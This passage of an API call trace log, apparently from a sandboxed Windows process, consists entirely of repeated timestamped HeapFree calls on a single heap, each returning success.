dwFlags=0x0, lpMem=0x25ff520 | out: hHeap=0x430000) returned 1 [0232.540] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2612730 | out: hHeap=0x430000) returned 1 [0232.540] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2625940 | out: hHeap=0x430000) returned 1 [0232.540] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2638b50 | out: hHeap=0x430000) returned 1 [0232.544] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x264bd60 | out: hHeap=0x430000) returned 1 [0232.544] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x265ef70 | out: hHeap=0x430000) returned 1 [0232.544] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2672180 | out: hHeap=0x430000) returned 1 [0232.544] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2685390 | out: hHeap=0x430000) returned 1 [0232.544] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26985a0 | out: hHeap=0x430000) returned 1 [0232.544] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26ab7b0 | out: hHeap=0x430000) returned 1 [0232.544] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26be9c0 | out: hHeap=0x430000) returned 1 [0232.544] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26d1bd0 | out: hHeap=0x430000) returned 1 [0232.544] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26e4de0 | out: hHeap=0x430000) returned 1 [0232.545] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x26f7ff0 | out: hHeap=0x430000) returned 1 [0232.545] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x270b200 | out: hHeap=0x430000) returned 1 [0232.545] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x271e410 | out: hHeap=0x430000) returned 1 [0232.545] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2731620 | out: hHeap=0x430000) returned 1 [0232.545] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2744830 | out: hHeap=0x430000) returned 1 [0232.551] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2757a40 | out: hHeap=0x430000) returned 1 [0232.551] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x276ac50 | out: hHeap=0x430000) returned 1 [0232.552] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x277de60 | out: hHeap=0x430000) returned 1 [0232.552] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2791070 | out: hHeap=0x430000) returned 1 [0232.552] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27a4280 | out: hHeap=0x430000) returned 1 [0232.552] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27b7490 | out: hHeap=0x430000) returned 1 [0232.553] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27ca6a0 | out: hHeap=0x430000) returned 1 [0232.553] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27dd8b0 | out: hHeap=0x430000) returned 1 [0232.553] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x27f0ac0 | out: hHeap=0x430000) returned 1 [0232.553] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2803cd0 | out: hHeap=0x430000) returned 1 [0232.553] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2816ee0 | out: hHeap=0x430000) returned 1 [0232.553] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x282a0f0 | out: hHeap=0x430000) returned 1 [0232.553] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x283d300 | out: hHeap=0x430000) returned 1 [0232.553] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2850510 | out: hHeap=0x430000) returned 1 [0232.559] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2863720 | out: hHeap=0x430000) returned 1 [0232.559] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2876930 | out: hHeap=0x430000) returned 1 [0232.559] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2889b40 | out: hHeap=0x430000) returned 1 [0232.559] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x289cd50 | out: hHeap=0x430000) returned 1 [0232.561] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28aff60 | out: hHeap=0x430000) returned 1 [0232.562] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28c3170 | out: hHeap=0x430000) returned 1 [0232.562] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28d6380 | out: hHeap=0x430000) returned 1 [0232.562] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28e9590 | out: hHeap=0x430000) returned 1 [0232.562] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x28fc7a0 | out: hHeap=0x430000) returned 1 [0232.562] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x290f9b0 | out: hHeap=0x430000) returned 1 [0232.562] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2922bc0 | out: hHeap=0x430000) returned 1 [0232.562] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2935dd0 | out: hHeap=0x430000) returned 1 [0232.563] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2948fe0 | out: hHeap=0x430000) returned 1 [0232.563] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x295c1f0 | out: hHeap=0x430000) returned 1 [0232.570] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x296f400 | out: hHeap=0x430000) returned 1 [0232.570] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2982610 | out: hHeap=0x430000) returned 1 [0232.570] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2995820 | out: hHeap=0x430000) returned 1 [0232.570] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29a8a30 | out: hHeap=0x430000) returned 1 [0232.570] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29bbc40 | out: hHeap=0x430000) returned 1 [0232.572] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29cee50 | out: hHeap=0x430000) returned 1 [0232.574] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29e2060 | out: hHeap=0x430000) returned 1 [0232.574] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x29f5270 | out: hHeap=0x430000) returned 1 [0232.574] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a08480 | out: hHeap=0x430000) returned 1 [0232.574] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a1b690 | out: hHeap=0x430000) returned 1 [0232.574] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a2e8a0 | out: hHeap=0x430000) returned 1 [0232.574] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a41ab0 | out: hHeap=0x430000) returned 1 [0232.574] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a54cc0 | out: hHeap=0x430000) returned 1 [0232.574] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a67ed0 | out: hHeap=0x430000) returned 1 [0232.821] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a7b0e0 | out: hHeap=0x430000) returned 1 [0232.821] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2a8e2f0 | out: hHeap=0x430000) returned 1 [0232.821] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2aa1500 | out: hHeap=0x430000) returned 1 [0232.821] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ab4710 | out: hHeap=0x430000) returned 1 [0232.821] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ac7920 | out: hHeap=0x430000) returned 1 [0232.822] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2adab30 | out: hHeap=0x430000) returned 1 [0232.824] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2aedd40 | out: hHeap=0x430000) returned 1 [0232.827] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b00f50 | out: hHeap=0x430000) returned 1 [0232.827] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b14160 | out: hHeap=0x430000) returned 1 [0232.827] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b27370 | out: hHeap=0x430000) returned 1 [0232.827] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b3a580 | out: hHeap=0x430000) returned 1 [0232.827] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b4d790 | out: hHeap=0x430000) returned 1 [0232.827] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b609a0 | out: hHeap=0x430000) returned 1 [0232.827] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b73bb0 | out: hHeap=0x430000) returned 1 [0232.832] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b86dc0 | out: hHeap=0x430000) returned 1 [0232.832] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2b99fd0 | out: hHeap=0x430000) returned 1 [0232.832] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2bad1e0 | out: hHeap=0x430000) returned 1 [0232.833] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2bc03f0 | out: hHeap=0x430000) returned 1 [0232.833] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2bd3600 | out: hHeap=0x430000) returned 1 [0232.833] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2be6810 | out: hHeap=0x430000) returned 1 [0232.836] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2bf9a20 | out: hHeap=0x430000) returned 1 [0232.838] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c0cc30 | out: hHeap=0x430000) returned 1 [0232.838] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c1fe40 | out: hHeap=0x430000) returned 1 [0232.838] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c33050 | out: hHeap=0x430000) returned 1 [0232.838] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c46260 | out: hHeap=0x430000) returned 1 [0232.838] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c59470 | out: hHeap=0x430000) returned 1 [0232.839] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c6c680 | out: hHeap=0x430000) returned 1 [0232.839] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c7f890 | out: hHeap=0x430000) returned 1 [0232.844] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c92aa0 | out: hHeap=0x430000) returned 1 [0232.844] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ca5cb0 | out: hHeap=0x430000) returned 1 [0232.844] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2cb8ec0 | out: hHeap=0x430000) returned 1 [0232.844] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ccc0d0 | out: hHeap=0x430000) returned 1 [0232.844] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2cdf2e0 | out: hHeap=0x430000) returned 1 [0232.848] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2cf24f0 | out: hHeap=0x430000) returned 1 [0232.849] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d05700 | out: hHeap=0x430000) returned 1 [0232.849] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d18910 | out: hHeap=0x430000) returned 1 [0232.850] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d40080 | out: hHeap=0x430000) returned 1 [0232.850] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d53290 | out: hHeap=0x430000) returned 1 [0232.850] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d664a0 | out: hHeap=0x430000) returned 1 [0232.850] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d796b0 | out: hHeap=0x430000) returned 1 [0232.850] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d8c8c0 | out: hHeap=0x430000) returned 1 [0232.850] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d9fad0 | out: hHeap=0x430000) returned 1 [0232.850] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2db2ce0 | out: hHeap=0x430000) returned 1 [0232.851] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2dc5ef0 | out: hHeap=0x430000) returned 1 [0232.851] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2dd9100 | out: hHeap=0x430000) returned 1 [0233.262] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2dec310 | out: hHeap=0x430000) returned 1 [0233.264] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2dff520 | out: hHeap=0x430000) returned 1 [0233.264] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e12730 | out: hHeap=0x430000) returned 1 [0233.264] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e25940 | out: hHeap=0x430000) returned 1 [0233.264] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e38b50 | out: hHeap=0x430000) returned 1 [0233.268] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e4bd60 | out: hHeap=0x430000) returned 1 [0233.269] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e5ef70 | out: hHeap=0x430000) returned 1 [0233.269] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e72180 | out: hHeap=0x430000) returned 1 [0233.269] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e85390 | out: hHeap=0x430000) returned 1 [0233.269] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2e985a0 | out: hHeap=0x430000) returned 1 [0233.269] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2eab7b0 | out: hHeap=0x430000) returned 1 [0233.272] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ebe9c0 | out: hHeap=0x430000) returned 1 [0233.273] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ed1bd0 | out: hHeap=0x430000) returned 1 [0233.273] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ee4de0 | out: hHeap=0x430000) returned 1 [0233.273] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ef7ff0 | out: hHeap=0x430000) returned 1 [0233.273] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f0b200 | out: hHeap=0x430000) returned 1 [0233.273] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f1e410 | out: hHeap=0x430000) returned 1 [0233.273] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f31620 | out: hHeap=0x430000) returned 1 [0233.273] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f44830 | out: hHeap=0x430000) returned 1 [0233.278] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f57a40 | out: hHeap=0x430000) returned 1 [0233.278] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f6ac50 | out: hHeap=0x430000) returned 1 [0233.279] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f7de60 | out: hHeap=0x430000) returned 1 [0233.449] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2f91070 | out: hHeap=0x430000) returned 1 [0233.450] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fa4280 | out: hHeap=0x430000) returned 1 [0233.450] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fb7490 | out: hHeap=0x430000) returned 1 [0233.450] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fca6a0 | out: hHeap=0x430000) returned 1 [0233.450] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2fdd8b0 | out: hHeap=0x430000) returned 1 [0233.450] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2ff0ac0 | out: hHeap=0x430000) returned 1 [0233.450] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3003cd0 | out: hHeap=0x430000) returned 1 [0233.450] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3016ee0 | out: hHeap=0x430000) returned 1 [0233.450] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x302a0f0 | out: hHeap=0x430000) returned 1 [0233.455] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x303d300 | out: hHeap=0x430000) returned 1 [0233.458] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3050510 | out: hHeap=0x430000) returned 1 [0233.462] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3063720 | out: hHeap=0x430000) returned 1 [0233.462] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3076930 | out: hHeap=0x430000) returned 1 [0233.462] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3089b40 | out: hHeap=0x430000) returned 1 [0233.462] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x309cd50 | out: hHeap=0x430000) returned 1 [0233.462] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30aff60 | out: hHeap=0x430000) returned 1 [0233.462] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30c3170 | out: hHeap=0x430000) returned 1 [0233.462] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30d6380 | out: hHeap=0x430000) returned 1 [0233.662] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30e9590 | out: hHeap=0x430000) returned 1 [0233.663] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x30fc7a0 | out: hHeap=0x430000) returned 1 [0233.664] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x310f9b0 | out: hHeap=0x430000) returned 1 [0233.664] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3122bc0 | out: hHeap=0x430000) returned 1 [0233.664] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3135dd0 | out: hHeap=0x430000) returned 1 [0233.664] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3148fe0 | out: hHeap=0x430000) returned 1 [0233.664] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x315c1f0 | out: hHeap=0x430000) returned 1 [0233.673] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x316f400 | out: hHeap=0x430000) returned 1 [0233.673] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3182610 | out: hHeap=0x430000) returned 1 [0233.675] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3195820 | out: hHeap=0x430000) returned 1 [0233.675] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x31a8a30 | out: hHeap=0x430000) returned 1 [0233.675] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x31bbc40 | out: hHeap=0x430000) returned 1 [0233.675] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x31cee50 | out: hHeap=0x430000) returned 1 [0233.675] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x31e2060 | out: hHeap=0x430000) returned 1 [0233.675] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x31f5270 | out: hHeap=0x430000) returned 1 [0233.675] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3208480 | out: hHeap=0x430000) returned 1 [0233.675] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x321b690 | out: hHeap=0x430000) returned 1 [0233.679] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x322e8a0 | out: hHeap=0x430000) returned 1 [0233.681] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3241ab0 | out: hHeap=0x430000) returned 1 [0233.681] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3254cc0 | out: hHeap=0x430000) returned 1 [0233.681] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3267ed0 | out: hHeap=0x430000) returned 1 [0233.685] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x327b0e0 | out: hHeap=0x430000) returned 1 [0233.685] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x328e2f0 | out: hHeap=0x430000) returned 1 [0233.685] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x32a1500 | out: hHeap=0x430000) returned 1 [0233.685] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x32b4710 | out: hHeap=0x430000) returned 1 [0233.687] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x32c7920 | out: hHeap=0x430000) returned 1 [0233.688] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x32dab30 | out: hHeap=0x430000) returned 1 [0233.688] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x32edd40 | out: hHeap=0x430000) returned 1 [0233.688] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3300f50 | out: hHeap=0x430000) returned 1 [0233.688] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3314160 | out: hHeap=0x430000) returned 1 [0233.688] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3327370 | out: hHeap=0x430000) returned 1 [0233.688] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x333a580 | out: hHeap=0x430000) returned 1 [0233.692] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x334d790 | out: hHeap=0x430000) returned 1 [0233.695] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x33609a0 | out: hHeap=0x430000) returned 1 [0233.695] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3373bb0 | out: hHeap=0x430000) returned 1 [0233.698] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3386dc0 | out: hHeap=0x430000) returned 1 [0233.698] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3399fd0 | out: hHeap=0x430000) returned 1 [0233.698] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x33ad1e0 | out: hHeap=0x430000) returned 1 [0233.698] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x33c03f0 | out: hHeap=0x430000) returned 1 [0233.700] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x33d3600 | out: hHeap=0x430000) returned 1 [0233.701] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x33e6810 | out: hHeap=0x430000) returned 1 [0233.701] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x33f9a20 | out: hHeap=0x430000) returned 1 [0233.701] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x340cc30 | out: hHeap=0x430000) returned 1 [0233.701] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x341fe40 | out: hHeap=0x430000) returned 1 [0233.701] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3433050 | out: hHeap=0x430000) returned 1 [0234.016] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3446260 | out: hHeap=0x430000) returned 1 [0234.017] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3459470 | out: hHeap=0x430000) returned 1 [0234.017] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x346c680 | out: hHeap=0x430000) returned 1 [0234.017] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x347f890 | out: hHeap=0x430000) returned 1 [0234.021] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3492aa0 | out: hHeap=0x430000) returned 1 [0234.021] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x34a5cb0 | out: hHeap=0x430000) returned 1 [0234.022] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x34b8ec0 | out: hHeap=0x430000) returned 1 [0234.022] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x34cc0d0 | out: hHeap=0x430000) returned 1 [0234.022] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x34df2e0 | out: hHeap=0x430000) returned 1 [0234.022] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x34f24f0 | out: hHeap=0x430000) returned 1 [0234.022] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3505700 | out: hHeap=0x430000) returned 1 [0234.024] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3518910 | out: hHeap=0x430000) returned 1 [0234.025] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x352bb20 | out: hHeap=0x430000) returned 1 [0234.025] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x353ed30 | out: hHeap=0x430000) returned 1 [0234.025] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3551f40 | out: hHeap=0x430000) returned 1 [0234.025] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3565150 | out: hHeap=0x430000) returned 1 [0234.028] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3578360 | out: hHeap=0x430000) returned 1 [0234.029] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x358b570 | out: hHeap=0x430000) returned 1 [0234.033] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x359e780 | out: hHeap=0x430000) returned 1 [0234.033] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x35b1990 | out: hHeap=0x430000) returned 1 [0234.033] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x35c4ba0 | out: hHeap=0x430000) returned 1 [0234.152] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x35d7db0 | out: hHeap=0x430000) returned 1 [0234.153] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x35eafc0 | out: hHeap=0x430000) returned 1 [0234.153] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x35fe1d0 | out: hHeap=0x430000) returned 1 [0234.153] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x36113e0 | out: hHeap=0x430000) returned 1 [0234.153] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x36245f0 | out: hHeap=0x430000) returned 1 [0234.156] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3637800 | out: hHeap=0x430000) returned 1 [0234.159] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x364aa10 | out: hHeap=0x430000) returned 1 [0234.159] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x365dc20 | out: hHeap=0x430000) returned 1 [0234.159] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3670e30 | out: hHeap=0x430000) returned 1 [0234.162] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3684040 | out: hHeap=0x430000) returned 1 [0234.172] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3697250 | out: hHeap=0x430000) returned 1 [0234.175] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x36aa460 | out: hHeap=0x430000) returned 1 [0234.175] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x36bd670 | out: hHeap=0x430000) returned 1 [0234.176] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x36d0880 | out: hHeap=0x430000) returned 1 [0234.176] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x36e3a90 | out: hHeap=0x430000) returned 1 [0234.176] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x36f6ca0 | out: hHeap=0x430000) returned 1 [0234.177] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x3709eb0 | out: hHeap=0x430000) returned 1 [0234.969] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x371d0c0 | out: hHeap=0x430000) returned 1 [0234.970] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37302d0 | out: hHeap=0x430000) returned 1 [0234.970] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37434e0 | out: hHeap=0x430000) returned 1 [0234.972] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x37566f0 | out: hHeap=0x430000) returned 1 [0234.974] HeapFree (in: hHeap=0x430000, dwFlags=0x0, 